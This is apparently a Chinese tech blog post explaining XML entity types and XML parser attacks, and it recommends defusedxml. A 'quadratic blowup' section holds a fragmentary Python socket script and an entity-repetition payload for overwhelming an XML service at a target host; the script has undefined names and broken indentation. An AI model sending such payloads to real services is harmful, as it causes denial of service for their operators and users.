xml攻击 简介、示例、防范

最新推荐文章于 2024-06-03 07:00:00 发布
最新推荐文章于 2024-06-03 07:00:00 发布
阅读量1.9k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42100211/article/details/116232803
版权

在查找openpyxl的官方介绍时,注意到security这一栏提到了针对xml解析器的攻击。

//实体,节选自:https://blog.csdn.net/janchin/article/details/46849209
//xml攻击一览,节选自:https://www.apiref.com/python-zh/library/xml.html#xml-vulnerabilities
//二次爆炸攻击示例,节选自:https://www.vishalmishra.in/post/xml-quadratic-blowup-attack/

文章目录

实体

实体是对数据的引用;根据实体种类的不同,XML 解析器将使用实体的替代文本或者外部文档的内容来替代实体引用。有字符实体、命名实体、外部实体、参数实体。

字符实体

' 是一个撇号:’ apostrophe
& 是一个与字符:& ampersand
" 是一个引号:"
&lt; 是一个小于号:<
&gt; 是一个大于号:>
&#65;(十进制值)或 &#x41;(十六进制值)表示大写字母A
&#169; 或 &#xa9;表示版权符号©
可以表示任何Unicode字符。
在进行其他实体相关的解析之前,将首先替代字符实体。对 XML 解析器而言,字符实体与直接输入指定字符的效果完全相同。

命名实体

也称内部实体。简单来说,实体就是宏,它们在我们处理文档时得到扩展。

<!ENTITY c "Chris">
<!ENTITY ch "&c; Herborth">

在一个文档中使用 &c; 将扩展为 Chris,&ch; 将扩展为完整的 Chris Herborth。

外部实体

创建一本图书并将每一章存储为一个单独的文件:

<!ENTITY chap1 SYSTEM "chapter-1.xml">
<!ENTITY chap2 SYSTEM "chapter-2.xml">
<!ENTITY chap3 SYSTEM "chapter-3.xml">

<?xml version="1.0" encoding="utf-8"?>
<!-- Pull in the chapter content: -->
&chap1;
&chap2;
&chap3;

参数实体

它们使用百分号(%)而不是与字符,可以是命名实体或外部实体。参数实体可以引用其它参数实体。

<!ENTITY % attrs "%coreattrs; %i18n; %events;">
<!ENTITY % coreattrs
 "id          ID             #IMPLIED
  class       CDATA          #IMPLIED
  style       %StyleSheet;   #IMPLIED
  title       %Text;         #IMPLIED"
  >
<!ENTITY % i18n
 "lang        %LanguageCode; #IMPLIED
  xml:lang    %LanguageCode; #IMPLIED
  dir         (ltr|rtl)      #IMPLIED"
  >

实体的好处

在需要反复输入相同的文本时,可以尝试利用实体。比如公司全名、产品名称、商标信息等。
使用实体可以避免逐一替换可能变化的常数,类似C语言中的宏。

XML攻击一览

在这里插入图片描述
defusedxml 是一个纯 Python 软件包,它修改了所有标准库 XML 解析器的子类,可以防止任何潜在的恶意操作。 对于解析不受信任的XML数据的任何服务器代码,建议使用此程序包。

二次爆炸攻击示例

import socket,ssl

###########Code Snippet###########
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
addr = (sys.argv[1], int(sys.argv[2]))
    try:
        s.connect(addr)
        data = 'GET /rest/version HTTP/1.0\r\nContent-Type: application/xml\r\n\r\n' + exploit_PayloadGen()
        s.send(data)
        resp = ss.recv(1000)
        s.close()
        print("Attack Failed!!")
    except:
        time.sleep(1)
        if status == True:
            print("Attack Successful. XML application pawned!!!")
            status=False
###################################

<?xml version="1.0"?><!DOCTYPE payload [
<!ENTITY Aloo "AAAAAAAAAAAAAAAAAAA...">
]>
<payload>&Aloo;&Aloo;&Aloo;&Aloo;&Aloo;&Aloo;...</payload>

也就是说,传输少量内容,解析器会放大很多倍。这跟udp反射攻击的思路有点像。

rookie19_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XML注入攻击
壮乡码农
12-09 1525
一、XML攻击是什么? XML攻击和SQL注入类似,XML注入是将用户输入的数据当成节点处理。 二、攻击原理 攻击前提是使用XML作为存储数据的方式,在代码对xml进行查询或者修改时,用户输入的是节点,将攻击的节点保存到xml中,从而影响到程序的运行。 例如: String xml = "<username>"+request.getParameter("username")+"</username>" ...
你所不知道的XML安全——XML攻击方法小结
01-09
转载: 你所不知道的XML安全——XML攻击方法小结. XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XML schemas(遵循XML Schemas 规范)和documents type definitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。
XML 相关漏洞风险研究
最新发布
有价值炮灰
06-03 1792
使用了这么久 XML,但是对其内部细节却不甚了解,本文就来补全这个缺憾。
你所不知道的XML安全—XML攻击方法小结
01-30
XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XMLschemas(遵循XMLSchemas规范)和documentstypedefinitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。XML可扩展标记语言,被设计用来传输和存储数据。其形式多样例如:1.文档格式(OOXML,ODF,PDF,RSS,DOCX...)2.图片格式(SVG,EXIFHeaders,...)3.配置文件(自定义名字,一般是.xml)4
XML攻击
agent_peakey的专栏
03-18 5114
XML防火墙 1.  背景 XML:      元素、属性、实体、PCDATA、CDATA DTD:   元素         属性         实体声明 内部/外部         实体 &实体名称; 命令空间:(xmlns(:ns-prefix)=”nsURI”),这个nsURI没有实际意义,仅仅是作为一个标识。 SOAP:逻辑上是一种协议,内容上是一种固定格式的XML
Web安全之XML注入
热门推荐
brizer的博客
09-06 1万+
XML注入攻击,和SQL注入的原理一样,都是攻击者输入恶意的代码来执行自身权限以外的功能。 XML是存储数据的一种方式,如果在修改或者查询时,没有做转义,直接输入或输出数据,都将导致XML注入漏洞。攻击者可以修改XML数据格式,增加新的XML节点,对数据处理流程产生影响。攻击下面是一个保存注册用户信息为XML格式的例子:final String GUESTROLE = "guest_role";
XML注入攻击总结
qq_32238611的博客
09-08 1万+
XML注入攻击总结普通的XML注入 普通的XML注入 原理 XML注入攻击和SQL注入攻击的原理一样,利用了XML解析机制的漏洞,如果系统对用户输入"<",">"没有做转义的处理,攻击者可以修改XML的数据格式,或者添加新的XML节点,就会导致解析XML异常,对流程产生影响。 如何注入攻击 如下XML是用于注册访问用户,其中用户名是由用户自己输入的。 <?xml version="1.0" encoding="UTF-8" ?> <user role="gues
JSP Struts过滤xss攻击的解决办法
10-19
JSP与Struts作为经典的Java Web开发框架,也需要对XSS攻击进行防范。本文将详细介绍如何使用Struts2框架的拦截器机制来过滤XSS攻击。 **1. XSS攻击简介** XSS攻击通常通过在网页中插入恶意JavaScript代码实现,当...
host头攻击代码Demo.rar
10-29
【标题】"host头攻击代码Demo.rar"是一个包含示例代码的压缩文件,主要展示了如何防范Web应用中的Host头部攻击。Host头攻击是网络安全领域的一个重要话题,它涉及到HTTP协议中的Host字段,攻击者可以通过篡改这个...
xml文件解析源码
02-22
4. 安全性:在处理用户输入的XML数据时,要防范XML注入攻击,确保对输入数据进行适当验证和清理。 总之,掌握XML文件解析是软件开发中的必备技能,TinyXML和TinyXML2提供了简单易用的工具,帮助开发者轻松处理XML...
JavaScript常用代码示例.zip
03-05
15. **安全问题**:了解XSS(跨站脚本攻击)和CSRF(跨站请求伪造)等常见Web安全问题,以及如何使用JavaScript来防范。 以上只是JavaScript开发中的一部分知识点,压缩包中的具体示例可能会涵盖其中的某些或全部...
xml外部实体攻击
07-17
xml外部实体使用,漏洞产生原因,详细举例攻击原理,修复方法等
XML手册 第4版 XML手册
04-13
8. **XML安全**:讨论XML相关的安全问题,如XML注入攻击和XXE(XML External Entity)攻击,以及如何通过验证和编码策略来防范这些威胁。 9. **XML在Web服务中的应用**:XML在Web服务中的角色,如WSDL(Web ...
XML外部实体攻击原理以及实战(XXE)(1)
Ba1_Ma0的博客
04-21 1963
extensible markup language(XML)类似于HTML的可扩展的标记语言,但主要区别在于,HTML是关于数据表示的,但是XML是关于数据传输的,XML是可读的,他被用在很多地方,比如API,UI布局,android应用程序配置文件,RSS等
XML实体注入攻击
Lethe's Blog
08-15 1431
0x01 基础知识 一、XML XML教程 1、什么是 XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 2、XML 与 HTML...
web渗透--24--XML注入攻击
武天旭的博客
09-16 1869
1、漏洞描述: 可扩展标记语言(Extensible Markup Language, XML),用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML是标准通用标记语言(SGML)的子集,非常适合Web传输。XML提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。XML注入攻击,和SQL注入的原理一样,都是攻...
xml注入漏洞
weixin_45095113的博客
10-28 4844
xml注入
XXE - XML外部实体注入攻击
javaEE_zero的博客
01-04 601
XXE漏洞、XML外部实体注入攻击
XXE漏洞--XML外部注入实体攻击初步学习--[NCTF 2019]Fake XML cookbook
qq_75120258的博客
04-25 823
XXE(XML External Entity)(XML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。在这种攻击中,攻击者利用应用程序对XML输入的处理不当,引入或“注入”恶意内容。这可能导致未授权的数据访问、服务拒绝攻击甚至执行远程代码。
xml脚本注入脚本示例,我需要防范
03-11
XML 脚本注入是一种常见的网络攻击方式,攻击者通过在 XML 数据中插入恶意脚本,从而实现对系统的攻击或者控制。为了防范这种攻击,可以采取以下措施: ...希望以上建议能够帮助您有效防范 XML 脚本注入攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值